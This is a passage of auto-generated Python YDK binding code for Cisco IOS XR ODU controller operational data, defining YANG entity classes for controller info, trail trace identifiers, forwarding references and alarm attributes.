**range:** 0..4294967295
**config**\: False
.. attribute:: flex_tolerence
FLEX tolerence
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: option
Option
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: tpn_value
TPN
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: num_ts
Number of TS
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: ts_g
TS Granuality
**type**\: :py:class:`OduTsGEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTsGEt>`
**config**\: False
.. attribute:: ts_b
child ts bitmap
**type**\: str
**length:** 0..256
**config**\: False
.. attribute:: tpn_b
tpn bitmap
**type**\: str
**length:** 0..256
**config**\: False
.. attribute:: pts_b
ts bitmap
**type**\: str
**length:** 0..256
**config**\: False
.. attribute:: fwd_ref
fwd ref
**type**\: str
**length:** 0..64
**config**\: False
.. attribute:: xc_id
Xconnect ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: xconnect_name
Xconnect Name
**type**\: str
**config**\: False
.. attribute:: fwd_ref_ifhandle
fwd\_ref ifhandle
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: no_parent_slot
Number of parent slot
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: xc_resp_code
Odu Xconnect Response code
**type**\: :py:class:`DpProgrammed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.DpProgrammed>`
**config**\: False
.. attribute:: performance_monitoring
Performance Monitoring
**type**\: :py:class:`OduPerMon <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPerMon>`
**config**\: False
.. attribute:: pmtimca
PM TIM\-CA state
**type**\: :py:class:`OduPmCaEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPmCaEt>`
**config**\: False
.. attribute:: pm_mode
ODU PM Mode
**type**\: :py:class:`OduPmMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduPmMode>`
**config**\: False
.. attribute:: nv_optical_support
NV Optical support
**type**\: bool
**config**\: False
.. attribute:: gmpls_tti_mode
tti mode
**type**\: :py:class:`GmplsTtiMode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.GmplsTtiMode>`
**config**\: False
.. attribute:: gmpls_tcm_id
tcm id
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: odu
Child Ts
**type**\: list of :py:class:`Odu_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odu_>`
**config**\: False
.. attribute:: odutcm
ODU TCM
**type**\: list of :py:class:`Odutcm <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Odutcm>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info, self).__init__()
self.yang_name = "info"
self.yang_parent_name = "controller"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("local", ("local", Odu.Controllers.Controller.Info.Local)), ("remote", ("remote", Odu.Controllers.Controller.Info.Remote)), ("tti-mode", ("tti_mode", Odu.Controllers.Controller.Info.TtiMode)), ("odu-fwd-ref", ("odu_fwd_ref", Odu.Controllers.Controller.Info.OduFwdRef)), ("alarm", ("alarm", Odu.Controllers.Controller.Info.Alarm)), ("te-ctx-data", ("te_ctx_data", Odu.Controllers.Controller.Info.TeCtxData)), ("xc-add-ctx-data", ("xc_add_ctx_data", Odu.Controllers.Controller.Info.XcAddCtxData)), ("xc-rem-ctx-data", ("xc_rem_ctx_data", Odu.Controllers.Controller.Info.XcRemCtxData)), ("odu-delay", ("odu_delay", Odu.Controllers.Controller.Info.OduDelay)), ("odu-terminate-ether", ("odu_terminate_ether", Odu.Controllers.Controller.Info.OduTerminateEther)), ("ains-info", ("ains_info", Odu.Controllers.Controller.Info.AinsInfo)), ("odu", ("odu", Odu.Controllers.Controller.Info.Odu_)), ("odutcm", ("odutcm", Odu.Controllers.Controller.Info.Odutcm))])
self._leafs = OrderedDict([
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduStateEt', '')])),
('sf', (YLeaf(YType.uint8, 'sf'), ['int'])),
('sd', (YLeaf(YType.uint8, 'sd'), ['int'])),
('loopback_mode', (YLeaf(YType.enumeration, 'loopback-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduLoopBackMode', '')])),
('derived_mode', (YLeaf(YType.enumeration, 'derived-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduDerState', '')])),
('inherit_sec_state', (YLeaf(YType.enumeration, 'inherit-sec-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduSecState', '')])),
('config_sec_state', (YLeaf(YType.enumeration, 'config-sec-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduSecState', '')])),
('gcc_mode', (YLeaf(YType.boolean, 'gcc-mode'), ['bool'])),
('child_name', (YLeaf(YType.str, 'child-name'), ['str'])),
('max_odu_child', (YLeaf(YType.uint8, 'max-odu-child'), ['int'])),
('od_uuser', (YLeaf(YType.enumeration, 'od-uuser'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduUserEt', '')])),
('resource_state', (YLeaf(YType.enumeration, 'resource-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduResourceEt', '')])),
('pt_type', (YLeaf(YType.enumeration, 'pt-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPtTypeEt', '')])),
('flex_type', (YLeaf(YType.enumeration, 'flex-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduFlexTypeEt', '')])),
('flex_bw', (YLeaf(YType.uint32, 'flex-bw'), ['int'])),
('flex_tolerence', (YLeaf(YType.uint16, 'flex-tolerence'), ['int'])),
('option', (YLeaf(YType.uint8, 'option'), ['int'])),
('tpn_value', (YLeaf(YType.uint8, 'tpn-value'), ['int'])),
('num_ts', (YLeaf(YType.uint8, 'num-ts'), ['int'])),
('ts_g', (YLeaf(YType.enumeration, 'ts-g'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTsGEt', '')])),
('ts_b', (YLeaf(YType.str, 'ts-b'), ['str'])),
('tpn_b', (YLeaf(YType.str, 'tpn-b'), ['str'])),
('pts_b', (YLeaf(YType.str, 'pts-b'), ['str'])),
('fwd_ref', (YLeaf(YType.str, 'fwd-ref'), ['str'])),
('xc_id', (YLeaf(YType.uint32, 'xc-id'), ['int'])),
('xconnect_name', (YLeaf(YType.str, 'xconnect-name'), ['str'])),
('fwd_ref_ifhandle', (YLeaf(YType.uint32, 'fwd-ref-ifhandle'), ['int'])),
('no_parent_slot', (YLeaf(YType.uint32, 'no-parent-slot'), ['int'])),
('xc_resp_code', (YLeaf(YType.enumeration, 'xc-resp-code'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'DpProgrammed', '')])),
('performance_monitoring', (YLeaf(YType.enumeration, 'performance-monitoring'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPerMon', '')])),
('pmtimca', (YLeaf(YType.enumeration, 'pmtimca'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPmCaEt', '')])),
('pm_mode', (YLeaf(YType.enumeration, 'pm-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduPmMode', '')])),
('nv_optical_support', (YLeaf(YType.boolean, 'nv-optical-support'), ['bool'])),
('gmpls_tti_mode', (YLeaf(YType.enumeration, 'gmpls-tti-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'GmplsTtiMode', '')])),
('gmpls_tcm_id', (YLeaf(YType.uint8, 'gmpls-tcm-id'), ['int'])),
])
self.state = None
self.sf = None
self.sd = None
self.loopback_mode = None
self.derived_mode = None
self.inherit_sec_state = None
self.config_sec_state = None
self.gcc_mode = None
self.child_name = None
self.max_odu_child = None
self.od_uuser = None
self.resource_state = None
self.pt_type = None
self.flex_type = None
self.flex_bw = None
self.flex_tolerence = None
self.option = None
self.tpn_value = None
self.num_ts = None
self.ts_g = None
self.ts_b = None
self.tpn_b = None
self.pts_b = None
self.fwd_ref = None
self.xc_id = None
self.xconnect_name = None
self.fwd_ref_ifhandle = None
self.no_parent_slot = None
self.xc_resp_code = None
self.performance_monitoring = None
self.pmtimca = None
self.pm_mode = None
self.nv_optical_support = None
self.gmpls_tti_mode = None
self.gmpls_tcm_id = None
self.local = Odu.Controllers.Controller.Info.Local()
self.local.parent = self
self._children_name_map["local"] = "local"
self.remote = Odu.Controllers.Controller.Info.Remote()
self.remote.parent = self
self._children_name_map["remote"] = "remote"
self.tti_mode = Odu.Controllers.Controller.Info.TtiMode()
self.tti_mode.parent = self
self._children_name_map["tti_mode"] = "tti-mode"
self.odu_fwd_ref = Odu.Controllers.Controller.Info.OduFwdRef()
self.odu_fwd_ref.parent = self
self._children_name_map["odu_fwd_ref"] = "odu-fwd-ref"
self.alarm = Odu.Controllers.Controller.Info.Alarm()
self.alarm.parent = self
self._children_name_map["alarm"] = "alarm"
self.te_ctx_data = Odu.Controllers.Controller.Info.TeCtxData()
self.te_ctx_data.parent = self
self._children_name_map["te_ctx_data"] = "te-ctx-data"
self.xc_add_ctx_data = Odu.Controllers.Controller.Info.XcAddCtxData()
self.xc_add_ctx_data.parent = self
self._children_name_map["xc_add_ctx_data"] = "xc-add-ctx-data"
self.xc_rem_ctx_data = Odu.Controllers.Controller.Info.XcRemCtxData()
self.xc_rem_ctx_data.parent = self
self._children_name_map["xc_rem_ctx_data"] = "xc-rem-ctx-data"
self.odu_delay = Odu.Controllers.Controller.Info.OduDelay()
self.odu_delay.parent = self
self._children_name_map["odu_delay"] = "odu-delay"
self.odu_terminate_ether = Odu.Controllers.Controller.Info.OduTerminateEther()
self.odu_terminate_ether.parent = self
self._children_name_map["odu_terminate_ether"] = "odu-terminate-ether"
self.ains_info = Odu.Controllers.Controller.Info.AinsInfo()
self.ains_info.parent = self
self._children_name_map["ains_info"] = "ains-info"
self.odu = YList(self)
self.odutcm = YList(self)
self._segment_path = lambda: "info"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info, ['state', 'sf', 'sd', 'loopback_mode', 'derived_mode', 'inherit_sec_state', 'config_sec_state', 'gcc_mode', 'child_name', 'max_odu_child', 'od_uuser', 'resource_state', 'pt_type', 'flex_type', 'flex_bw', 'flex_tolerence', 'option', 'tpn_value', 'num_ts', 'ts_g', 'ts_b', 'tpn_b', 'pts_b', 'fwd_ref', 'xc_id', 'xconnect_name', 'fwd_ref_ifhandle', 'no_parent_slot', 'xc_resp_code', 'performance_monitoring', 'pmtimca', 'pm_mode', 'nv_optical_support', 'gmpls_tti_mode', 'gmpls_tcm_id'], name, value)
class Local(_Entity_):
"""
TTI
.. attribute:: router_id
Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: if_index
IfIndex
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Local, self).__init__()
self.yang_name = "local"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
('if_index', (YLeaf(YType.uint32, 'if-index'), ['int'])),
])
self.router_id = None
self.if_index = None
self._segment_path = lambda: "local"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Local, ['router_id', 'if_index'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Local']['meta_info']
class Remote(_Entity_):
"""
Remote
.. attribute:: router_id
Router ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: if_index
IfIndex
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.Remote, self).__init__()
self.yang_name = "remote"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
('if_index', (YLeaf(YType.uint32, 'if-index'), ['int'])),
])
self.router_id = None
self.if_index = None
self._segment_path = lambda: "remote"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.Remote, ['router_id', 'if_index'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.Remote']['meta_info']
class TtiMode(_Entity_):
"""
TTI
.. attribute:: tx
String Sent
**type**\: :py:class:`Tx <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TtiMode.Tx>`
**config**\: False
.. attribute:: exp
String Expected
**type**\: :py:class:`Exp <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TtiMode.Exp>`
**config**\: False
.. attribute:: rec
String Received
**type**\: :py:class:`Rec <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.TtiMode.Rec>`
**config**\: False
.. attribute:: g709tti_sent_mode
G709TTI Sent
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
.. attribute:: g709tti_exp_mode
G709TTI Expected
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
.. attribute:: g709tti_rec_mode
G709TTI Recieved
**type**\: :py:class:`OduTtiEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduTtiEt>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.TtiMode, self).__init__()
self.yang_name = "tti-mode"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("tx", ("tx", Odu.Controllers.Controller.Info.TtiMode.Tx)), ("exp", ("exp", Odu.Controllers.Controller.Info.TtiMode.Exp)), ("rec", ("rec", Odu.Controllers.Controller.Info.TtiMode.Rec))])
self._leafs = OrderedDict([
('g709tti_sent_mode', (YLeaf(YType.enumeration, 'g709tti-sent-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
('g709tti_exp_mode', (YLeaf(YType.enumeration, 'g709tti-exp-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
('g709tti_rec_mode', (YLeaf(YType.enumeration, 'g709tti-rec-mode'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduTtiEt', '')])),
])
self.g709tti_sent_mode = None
self.g709tti_exp_mode = None
self.g709tti_rec_mode = None
self.tx = Odu.Controllers.Controller.Info.TtiMode.Tx()
self.tx.parent = self
self._children_name_map["tx"] = "tx"
self.exp = Odu.Controllers.Controller.Info.TtiMode.Exp()
self.exp.parent = self
self._children_name_map["exp"] = "exp"
self.rec = Odu.Controllers.Controller.Info.TtiMode.Rec()
self.rec.parent = self
self._children_name_map["rec"] = "rec"
self._segment_path = lambda: "tti-mode"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.TtiMode, ['g709tti_sent_mode', 'g709tti_exp_mode', 'g709tti_rec_mode'], name, value)
class Tx(_Entity_):
"""
String Sent
.. attribute:: sapi
tx String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: dapi
exp String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: operator_specific
rec String
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.TtiMode.Tx, self).__init__()
self.yang_name = "tx"
self.yang_parent_name = "tti-mode"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
])
self.sapi = []
self.dapi = []
self.operator_specific = []
self._segment_path = lambda: "tx"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.TtiMode.Tx, ['sapi', 'dapi', 'operator_specific'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.TtiMode.Tx']['meta_info']
class Exp(_Entity_):
"""
String Expected
.. attribute:: sapi
tx String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: dapi
exp String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: operator_specific
rec String
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.TtiMode.Exp, self).__init__()
self.yang_name = "exp"
self.yang_parent_name = "tti-mode"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
])
self.sapi = []
self.dapi = []
self.operator_specific = []
self._segment_path = lambda: "exp"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.TtiMode.Exp, ['sapi', 'dapi', 'operator_specific'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.TtiMode.Exp']['meta_info']
class Rec(_Entity_):
"""
String Received
.. attribute:: sapi
tx String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: dapi
exp String
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: operator_specific
rec String
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.TtiMode.Rec, self).__init__()
self.yang_name = "rec"
self.yang_parent_name = "tti-mode"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('sapi', (YLeafList(YType.uint8, 'sapi'), ['int'])),
('dapi', (YLeafList(YType.uint8, 'dapi'), ['int'])),
('operator_specific', (YLeafList(YType.uint8, 'operator-specific'), ['int'])),
])
self.sapi = []
self.dapi = []
self.operator_specific = []
self._segment_path = lambda: "rec"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.TtiMode.Rec, ['sapi', 'dapi', 'operator_specific'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.TtiMode.Rec']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.TtiMode']['meta_info']
class OduFwdRef(_Entity_):
"""
ODU fwd\_ref
.. attribute:: od_uuser
ODU User
**type**\: :py:class:`OduUserEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduUserEt>`
**config**\: False
.. attribute:: resource_state
Resource State
**type**\: :py:class:`OduResourceEt <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.OduResourceEt>`
**config**\: False
"""
_prefix = 'controller-odu-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(Odu.Controllers.Controller.Info.OduFwdRef, self).__init__()
self.yang_name = "odu-fwd-ref"
self.yang_parent_name = "info"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('od_uuser', (YLeaf(YType.enumeration, 'od-uuser'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduUserEt', '')])),
('resource_state', (YLeaf(YType.enumeration, 'resource-state'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper', 'OduResourceEt', '')])),
])
self.od_uuser = None
self.resource_state = None
self._segment_path = lambda: "odu-fwd-ref"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Odu.Controllers.Controller.Info.OduFwdRef, ['od_uuser', 'resource_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_controller_odu_oper as meta
return meta._meta_table['Odu.Controllers.Controller.Info.OduFwdRef']['meta_info']
class Alarm(_Entity_):
"""
Alarm
.. attribute:: oci
Open Connection Indiction
**type**\: :py:class:`Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Oci>`
**config**\: False
.. attribute:: ais
Alarm Indication Signal
**type**\: :py:class:`Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Ais>`
**config**\: False
.. attribute:: lck
Upstream Connection Locked
**type**\: :py:class:`Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Lck>`
**config**\: False
.. attribute:: bdi
Backward Defect Indication
**type**\: :py:class:`Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Bdi>`
**config**\: False
.. attribute:: eoc
GCC End of Channel
**type**\: :py:class:`Eoc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Eoc>`
**config**\: False
.. attribute:: ptim
Payload Type Identifier Mismatch
**type**\: :py:class:`Ptim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Ptim>`
**config**\: False
.. attribute:: tim
Trace Identifier Mismatch information
**type**\: :py:class:`Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tim>`
**config**\: False
.. attribute:: iae
Incoming Alignment Error
**type**\: :py:class:`Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Iae>`
**config**\: False
.. attribute:: biae
Backward Incoming Alignment Error
**type**\: :py:class:`Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Biae>`
**config**\: False
.. attribute:: sf_ber
SF BER alarm
**type**\: :py:class:`SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.SfBer>`
**config**\: False
.. attribute:: sd_ber
SD BER alarm
**type**\: :py:class:`SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.SdBer>`
**config**\: False
.. attribute:: csf
Client Signal Failure
**type**\: :py:class:`Csf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Csf>`
**config**\: False
.. attribute:: tcm1_ais
TCM1 Alarm Indication Signal
**type**\: :py:class:`Tcm1Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Ais>`
**config**\: False
.. attribute:: tcm1_ltc
TCM1 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm1Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Ltc>`
**config**\: False
.. attribute:: tcm1_oci
TCM1 Open Connection Indiction
**type**\: :py:class:`Tcm1Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Oci>`
**config**\: False
.. attribute:: tcm1_lck
TCM1 Upstream Connection Locked
**type**\: :py:class:`Tcm1Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Lck>`
**config**\: False
.. attribute:: tcm1_iae
TCM1 Incoming Alignment Error
**type**\: :py:class:`Tcm1Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Iae>`
**config**\: False
.. attribute:: tcm1_biae
TCM1 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm1Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Biae>`
**config**\: False
.. attribute:: tcm1_bdi
TCM1 Backward Defect Monitoring
**type**\: :py:class:`Tcm1Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Bdi>`
**config**\: False
.. attribute:: tcm1_tim
TCM1 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm1Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1Tim>`
**config**\: False
.. attribute:: tcm1_sf_ber
TCM1 SF BER alarm
**type**\: :py:class:`Tcm1SfBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1SfBer>`
**config**\: False
.. attribute:: tcm1_sd_ber
TCM1 SD BER alarm
**type**\: :py:class:`Tcm1SdBer <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm1SdBer>`
**config**\: False
.. attribute:: tcm2_ais
TCM2 Alarm Indication Signal
**type**\: :py:class:`Tcm2Ais <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Ais>`
**config**\: False
.. attribute:: tcm2_ltc
TCM2 Loss of Tandem connection Monitoring
**type**\: :py:class:`Tcm2Ltc <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Ltc>`
**config**\: False
.. attribute:: tcm2_oci
TCM2 Open Connection Indiction
**type**\: :py:class:`Tcm2Oci <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Oci>`
**config**\: False
.. attribute:: tcm2_lck
TCM2 Upstream Connection Locked
**type**\: :py:class:`Tcm2Lck <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Lck>`
**config**\: False
.. attribute:: tcm2_iae
TCM2 Incoming Alignment Error
**type**\: :py:class:`Tcm2Iae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Iae>`
**config**\: False
.. attribute:: tcm2_biae
TCM2 Backward Incoming Alignment Error
**type**\: :py:class:`Tcm2Biae <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Biae>`
**config**\: False
.. attribute:: tcm2_bdi
TCM2 Backward Defect Monitoring
**type**\: :py:class:`Tcm2Bdi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Bdi>`
**config**\: False
.. attribute:: tcm2_tim
TCM2 Trail Trace Identifier Mismatch
**type**\: :py:class:`Tcm2Tim <ydk.models.cisco_ios_xr.Cisco_IOS_XR_controller_odu_oper.Odu.Controllers.Controller.Info.Alarm.Tcm2Tim>`
**config**\: False
.. attribute:: tcm2_sf_ber
TCM2 SF BER alarm
